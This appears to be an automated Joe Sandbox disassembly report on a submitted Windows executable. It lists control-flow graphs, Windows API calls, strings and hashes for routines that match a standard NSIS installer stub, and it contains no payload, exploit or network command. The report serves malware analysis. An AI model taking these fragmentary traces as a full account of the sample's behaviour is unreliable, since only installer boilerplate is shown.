                                                                                                                                                                                                                                      control_flow_graph 299 403bb6-403bce call 4068d4 302 403bd0-403bdb GetUserDefaultUILanguage call 40644e 299->302 303 403be2-403c19 call 4063d5 299->303 306 403be0 302->306 308 403c31-403c37 lstrcatW 303->308 309 403c1b-403c2c call 4063d5 303->309 310 403c3c-403c65 call 403e8c call 405ede 306->310 308->310 309->308 316 403cf7-403cff call 405ede 310->316 317 403c6b-403c70 310->317 323 403d01-403d08 call 406544 316->323 324 403d0d-403d32 LoadImageW 316->324 317->316 318 403c76-403c9e call 4063d5 317->318 318->316 327 403ca0-403ca4 318->327 323->324 325 403db3-403dbb call 40140b 324->325 326 403d34-403d64 RegisterClassW 324->326 340 403dc5-403dd0 call 403e8c 325->340 341 403dbd-403dc0 325->341 329 403e82 326->329 330 403d6a-403dae SystemParametersInfoW CreateWindowExW 326->330 332 403cb6-403cc2 lstrlenW 327->332 333 403ca6-403cb3 call 405e03 327->333 338 403e84-403e8b 329->338 330->325 334 403cc4-403cd2 lstrcmpiW 332->334 335 403cea-403cf2 call 405dd6 call 406507 332->335 333->332 334->335 339 403cd4-403cde GetFileAttributesW 334->339 335->316 344 403ce0-403ce2 339->344 345 403ce4-403ce5 call 405e22 339->345 351 403dd6-403df0 ShowWindow call 406864 340->351 352 403e59-403e5a call 40563c 340->352 341->338 344->335 344->345 345->335 359 403df2-403df7 call 406864 351->359 360 403dfc-403e0e GetClassInfoW 351->360 355 403e5f-403e61 352->355 357 403e63-403e69 355->357 358 403e7b-403e7d call 40140b 355->358 357->341 361 403e6f-403e76 call 40140b 357->361 358->329 359->360 364 403e10-403e20 GetClassInfoW RegisterClassW 360->364 365 403e26-403e49 DialogBoxParamW call 40140b 360->365 361->341 364->365 368 403e4e-403e57 call 403b06 365->368 368->338
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                                                                                        • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,75573420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                                                                                                                                                                                                                                        • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,75573420), ref: 00403CB7
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,00435800,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403D1E
                                                                                                                                                                                                                                      • RegisterClassW.USER32(004291C0), ref: 00403D5B
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                                                                                                                                                                                                                                      • RegisterClassW.USER32(004291C0), ref: 00403E20
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                      • API String ID: 606308-807418202
                                                                                                                                                                                                                                      • Opcode ID: fb649e24f98e44229479f169acb53c45bca4c534de1dfb1f3cfba33920d5d302
                                                                                                                                                                                                                                      • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb649e24f98e44229479f169acb53c45bca4c534de1dfb1f3cfba33920d5d302
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 372 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 375 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 372->375 376 4030cd-4030d2 372->376 384 4031f0-4031fe call 403019 375->384 385 40310b 375->385 377 4032ad-4032b1 376->377 391 403200-403203 384->391 392 403253-403258 384->392 387 403110-403127 385->387 389 403129 387->389 390 40312b-403134 call 403499 387->390 389->390 398 40325a-403262 call 403019 390->398 399 40313a-403141 390->399 394 403205-40321d call 4034af call 403499 391->394 395 403227-403251 GlobalAlloc call 4034af call 4032b4 391->395 392->377 394->392 420 40321f-403225 394->420 395->392 418 403264-403275 395->418 398->392 403 403143-403157 call 405fb2 399->403 404 4031bd-4031c1 399->404 409 4031cb-4031d1 403->409 423 403159-403160 403->423 408 4031c3-4031ca call 403019 404->408 404->409 408->409 415 4031e0-4031e8 409->415 416 4031d3-4031dd call 4069c1 409->416 415->387 419 4031ee 415->419 416->415 425 403277 418->425 426 40327d-403282 418->426 419->384 420->392 420->395 423->409 424 403162-403169 423->424 424->409 428 40316b-403172 424->428 425->426 429 403283-403289 426->429 428->409 430 403174-40317b 428->430 429->429 431 40328b-4032a6 SetFilePointer call 405fb2 429->431 430->409 432 40317d-40319d 430->432 435 4032ab 431->435 432->392 434 4031a3-4031a7 432->434 436 4031a9-4031ad 434->436 437 4031af-4031b7 434->437 435->377 436->419 436->437 437->409 438 4031b9-4031bb 437->438 438->409
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                      • API String ID: 2803837635-33365754
                                                                                                                                                                                                                                      • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                                                                                      • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 439 406544-40654f 440 406551-406560 439->440 441 406562-406578 439->441 440->441 442 406590-406599 441->442 443 40657a-406587 441->443 445 406774-40677f 442->445 446 40659f 442->446 443->442 444 406589-40658c 443->444 444->442 448 406781-406785 call 406507 445->448 449 40678a-40678b 445->449 447 4065a4-4065b1 446->447 447->445 450 4065b7-4065c0 447->450 448->449 452 406752 450->452 453 4065c6-406603 450->453 454 406760-406763 452->454 455 406754-40675e 452->455 456 4066f6-4066fb 453->456 457 406609-406610 453->457 458 406765-40676e 454->458 455->458 459 4066fd-406703 456->459 460 40672e-406733 456->460 461 406612-406614 457->461 462 406615-406617 457->462 458->445 463 4065a1 458->463 464 406713-40671f call 406507 459->464 465 406705-406711 call 40644e 459->465 468 406742-406750 lstrlenW 460->468 469 406735-40673d call 406544 460->469 461->462 466 406654-406657 462->466 467 406619-406640 call 4063d5 462->467 463->447 480 406724-40672a 464->480 465->480 470 406667-40666a 466->470 471 406659-406665 GetSystemDirectoryW 466->471 484 4066dd-4066e1 467->484 486 406646-40664f call 406544 467->486 468->458 469->468 477 4066d3-4066d5 470->477 478 40666c-40667a GetWindowsDirectoryW 470->478 476 4066d7-4066db 471->476 476->484 485 4066ee-4066f4 call 40678e 476->485 477->476 483 40667c-406684 477->483 478->477 480->468 482 40672c 480->482 482->485 490 406686-40668f 483->490 491 40669b-4066b1 SHGetSpecialFolderLocation 483->491 484->485 487 4066e3-4066e9 lstrcatW 484->487 485->468 486->476 487->485 496 406697-406699 490->496 494 4066b3-4066cd SHGetPathFromIDListW CoTaskMemFree 491->494 495 4066cf 491->495 494->476 494->495 495->477 496->476 496->491
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040665F
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004055A0,Completed,00000000,00000000,00418EC0,00000000), ref: 00406672
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                      • API String ID: 4260037668-905382516
                                                                                                                                                                                                                                      • Opcode ID: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                                                                      • Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f256cf52d51bc45a82507bfe95e0a7ec11cb3c5eab23a7c9971658e825af729
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 497 40176f-401794 call 402da6 call 405e4d 502 401796-40179c call 406507 497->502 503 40179e-4017b0 call 406507 call 405dd6 lstrcatW 497->503 508 4017b5-4017b6 call 40678e 502->508 503->508 512 4017bb-4017bf 508->512 513 4017c1-4017cb call 40683d 512->513 514 4017f2-4017f5 512->514 521 4017dd-4017ef 513->521 522 4017cd-4017db CompareFileTime 513->522 515 4017f7-4017f8 call 405fd2 514->515 516 4017fd-401819 call 405ff7 514->516 515->516 524 40181b-40181e 516->524 525 40188d-4018b6 call 405569 call 4032b4 516->525 521->514 522->521 526 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 524->526 527 40186f-401879 call 405569 524->527 537 4018b8-4018bc 525->537 538 4018be-4018ca SetFileTime 525->538 526->512 559 401864-401865 526->559 539 401882-401888 527->539 537->538 541 4018d0-4018db FindCloseChangeNotification 537->541 538->541 542 402c33 539->542 544 4018e1-4018e4 541->544 545 402c2a-402c2d 541->545 546 402c35-402c39 542->546 549 4018e6-4018f7 call 406544 lstrcatW 544->549 550 4018f9-4018fc call 406544 544->550 545->542 556 401901-4023a2 call 405b67 549->556 550->556 556->545 556->546 559->539 561 401867-401868 559->561 561->527
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                                        • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                                                                                                                                                                                                                        • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                                                                        • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                                                                        • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                                                                                                                                                                                                                                        • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                                                                        • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                                                                        • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                                                                        • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache$open$open cmd
                                                                                                                                                                                                                                      • API String ID: 1941528284-1328275964
                                                                                                                                                                                                                                      • Opcode ID: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                                                                      • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cff18b76cdb8d76bbb3d49e6b079a2043f43baf22f2567b8a93e71465b720055
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 563 405569-40557e 564 405584-405595 563->564 565 405635-405639 563->565 566 4055a0-4055ac lstrlenW 564->566 567 405597-40559b call 406544 564->567 569 4055c9-4055cd 566->569 570 4055ae-4055be lstrlenW 566->570 567->566 572 4055dc-4055e0 569->572 573 4055cf-4055d6 SetWindowTextW 569->573 570->565 571 4055c0-4055c4 lstrcatW 570->571 571->569 574 4055e2-405624 SendMessageW * 3 572->574 575 405626-405628 572->575 573->572 574->575 575->565 576 40562a-40562d 575->576 576->565
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                      • String ID: Completed
                                                                                                                                                                                                                                      • API String ID: 1495540970-3087654605
                                                                                                                                                                                                                                      • Opcode ID: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                                                                      • Instruction ID: ee6600945c56622aa7300660faa8e28c1de3552a97c3cc7a142cd67d2e53ceba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9e82e23593916cc8667a553ec3376e3b2091dc3bfbd8f68e29cf771addae687
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7021AC71900518BACF219F96DD84ACFBFB9EF45354F50807AF904B62A0C7798A51CFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 577 4032b4-4032cb 578 4032d4-4032dc 577->578 579 4032cd 577->579 580 4032e3-4032e8 578->580 581 4032de 578->581 579->578 582 4032f8-403305 call 403499 580->582 583 4032ea-4032f3 call 4034af 580->583 581->580 587 403450 582->587 588 40330b-40330f 582->588 583->582 589 403452-403453 587->589 590 403315-403335 GetTickCount call 406a2f 588->590 591 403439-40343b 588->591 592 403492-403496 589->592 601 40348f 590->601 602 40333b-403343 590->602 593 403484-403488 591->593 594 40343d-403440 591->594 597 403455-40345b 593->597 598 40348a 593->598 599 403442 594->599 600 403445-40344e call 403499 594->600 604 403460-40346e call 403499 597->604 605 40345d 597->605 598->601 599->600 600->587 610 40348c 600->610 601->592 606 403345 602->606 607 403348-403356 call 403499 602->607 604->587 614 403470-40347c call 4060a9 604->614 605->604 606->607 607->587 615 40335c-403365 607->615 610->601 620 403435-403437 614->620 621 40347e-403481 614->621 617 40336b-403388 call 406a4f 615->617 623 403431-403433 617->623 624 40338e-4033a5 GetTickCount 617->624 620->589 621->593 623->589 625 4033f0-4033f2 624->625 626 4033a7-4033af 624->626 627 4033f4-4033f8 625->627 628 403425-403429 625->628 629 4033b1-4033b5 626->629 630 4033b7-4033e8 MulDiv wsprintfW call 405569 626->630 631 4033fa-4033ff call 4060a9 627->631 632 40340d-403413 627->632 628->602 633 40342f 628->633 629->625 629->630 637 4033ed 630->637 638 403404-403406 631->638 636 403419-40341d 632->636 633->601 636->617 639 403423 636->639 637->625 638->620 640 403408-40340b 638->640 639->601 640->636
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
